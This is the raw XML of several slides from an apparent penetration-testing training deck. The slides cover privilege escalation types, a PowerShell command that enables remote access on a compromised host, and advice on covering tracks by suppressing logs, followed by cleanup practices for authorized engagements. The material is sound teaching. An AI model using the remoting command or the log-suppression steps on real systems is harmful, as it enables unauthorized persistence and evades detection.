            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>    &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>Enable-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>PSRemoting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>SkipNetworkProfileCheck</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t> -Force</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="181A1F"/>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This command configures the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>WinRM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> service to automatically start and sets up a firewall rule to allow inbound connections to the compromised system.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="181A1F"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10460372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Understanding How to Perform Lateral Movement, Detection Avoidance, and Enumeration</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 0"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="100" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="274320"/>
            <a:ext cx="9144000" cy="386033"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Post-Exploitation Privilege Escalation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="CaixaDeTexto 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10359F8A-B56A-3EB2-6C83-FB7410B44542}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2311" y="1088571"/>
            <a:ext cx="9021277"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b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Privilege escalation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> is the act of gaining access to resources that normally would be protected from an application or a user. </a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="140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This results in a user gaining additional privileges beyond those that were originally intended by the developer of the application.</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="1400">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>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There are two general types of privilege escalation: vertical and horizontal.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="CaixaDeTexto 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5864AF26-9D47-D357-E812-E73655EAD214}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2866485"/>
            <a:ext cx="4779188"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Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Vertical Privilege Escalation</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial,Sans-Serif"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>With vertical privilege escalation, as illustrated in the figure, a lower-privileged user accesses functions reserved for higher-privileged users (such as root or administrator access).</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Imagem 5" descr="Diagrama&#10;&#10;Descrição gerada automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D2ED48C-4738-D870-2732-45C9447C6AD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4914900" y="2986538"/>
            <a:ext cx="3907765" cy="1758350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="292100" dist="139700" dir="2700000" algn="tl" rotWithShape="0">
              <a:srgbClr val="333333">
                <a:alpha val="65000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>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dirty="0"/>
              <a:t>51</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3505069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Understanding How to Perform Lateral Movement, Detection Avoidance, and Enumeration</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 0"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="100" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="274320"/>
            <a:ext cx="9144000" cy="386033"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Post-Exploitation Privilege Escalation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> (Cont.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="CaixaDeTexto 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5864AF26-9D47-D357-E812-E73655EAD214}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="979457"/>
            <a:ext cx="8617941"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Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Horizontal Privilege Escalation</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1400" b="1">
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>With horizontal privilege escalation, as illustrated in the figure below, a regular user accesses functions or content reserved for other non-root or non-admin users. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>For instance, say that after exploiting a system, you are able to get shell access as the user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>omar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="CaixaDeTexto 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45894254-E6B2-140A-90D1-4A59B4820B8B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2427975"/>
            <a:ext cx="421821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1400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>However, that user does not have permissions to read some files on the system. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial,Sans-Serif"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial,Sans-Serif"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>You then find that another user, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>hannah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>, has access to those files. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial,Sans-Serif"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial,Sans-Serif"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>You then find a way to escalate your privileges as the user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>hannah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> to access those files.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Imagem 7" descr="Diagrama&#10;&#10;Descrição gerada automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46F8777C-0C02-B998-8F41-6A5063005368}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4472797" y="2465899"/>
            <a:ext cx="4220473" cy="2314392"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="292100" dist="139700" dir="2700000" algn="tl" rotWithShape="0">
              <a:srgbClr val="333333">
                <a:alpha val="65000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>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dirty="0"/>
              <a:t>52</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42047301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Understanding How to Perform Lateral Movement, Detection Avoidance, and Enumeration</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 0"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="100" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="274320"/>
            <a:ext cx="9144000" cy="386033"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>How to Cover Your Tracks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="CaixaDeTexto 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5864AF26-9D47-D357-E812-E73655EAD214}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="979457"/>
            <a:ext cx="8617941"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After compromising a system during a penetration testing engagement, you should always cover your tracks to avoid detection by suppressing logs (when possible), deleting user accounts that could have been created on the system, and deleting any files that were created. </a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="Arial"/>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In addition, after a penetration testing engagement is complete, you should clean up all systems. </a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="Arial"/>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As a best practice, you should discuss these tasks and document them in the rules of engagement document during the pre-engagement phase. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>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dirty="0"/>
              <a:t>53</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37481487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Understanding How to Perform Lateral Movement, Detection Avoidance, and Enumeration</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 0"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="100" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="274320"/>
            <a:ext cx="9144000" cy="386033"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>How to Cover Your Tracks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> (Cont.)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="CaixaDeTexto 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5864AF26-9D47-D357-E812-E73655EAD214}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="979457"/>
            <a:ext cx="8617941"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The following are a few best practices to keep in mind during the cleanup process:</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="1400" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Delete all user accounts used during the test.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="181A1F"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Delete all files, executable binaries, scripts, and temporary files from compromised systems. A secure deletion method may be preferred. NIST Special Publication 800-88, Revision 1: “Guidelines for Media Sanitization,” provides guidance for media sanitation. This methodology should be discussed with your client and the owner of the affected systems.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="181A1F"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Return any modified systems and their configuration to their original values and parameters.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="181A1F"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Remove all backdoors, daemons, services, and rootkits installed.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="181A1F"/>
